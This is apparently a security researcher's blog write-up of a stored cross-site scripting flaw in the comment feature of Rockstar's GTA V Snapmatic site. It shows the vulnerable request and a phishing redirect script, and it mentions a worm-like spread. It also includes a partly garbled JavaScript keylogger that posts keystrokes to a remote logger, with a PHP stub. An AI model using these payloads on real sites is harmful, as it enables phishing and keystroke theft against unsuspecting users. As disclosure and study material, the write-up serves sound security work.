Stored XSS on Rockstar Game

Severity: High

Complexity : Easy

Weakness : Cross Site Scripting

Date : Nov 2016

  • Rockstar’s Current Game GTA V have a feature Snapmatic which is a app in game to take picture’s while playing and it get’s uploaded at

  • Vulnerability was while commenting on snapmatic picture’s they were not filtering malicious tags / javascript .
POST /games/gtav/snapmatic/ajax/comment HTTP/1.1
Connection: close
Content-Length: 57
Accept: application/json, text/javascript, */*; q=0.01
RequestVerificationToken: REDACTEDTOKEN
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Content-Type: application/json
Accept-Language: en-US,en;q=0.8
Cookie: csrf:token<REDACTED>
{"ugcId":"PICTUREID","comment":"PAYLOAD HERE"}
  • I Used the Basic payload to check the response & got script popup.
  • Worst Scenario is Script was directly getting executed in background when viewing images from that might be because of rendering the first comment’s .
  • To Increase the impact i tried to find ways to make other user’s to comment payload on snapmatic images’s just like a WORM using ajax call’s but unfortunately they were using extra protection for csrf checking as you can see from above request.
  • As payload is getting render directly on main page /snapmatic
  • We can redirect all the user’s visiting /snapmatic to attacker choice url just like phishing .
<script>window.onload = window.location.href= ‘';</script>
  • Or By adding a Keylogger :
  • Keylog.js
document.onkeypress = function(evt) {
evt = evt || window.event
key = String.fromCharCode(evt.charCode)
if (key) {
var http = new XMLHttpRequest();
var param = encodeURI(key)"POST","",true);
  • Keylog.php
$fp = fopen($logfile, "a");
fwrite($fp, $key);

Security Analyst

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store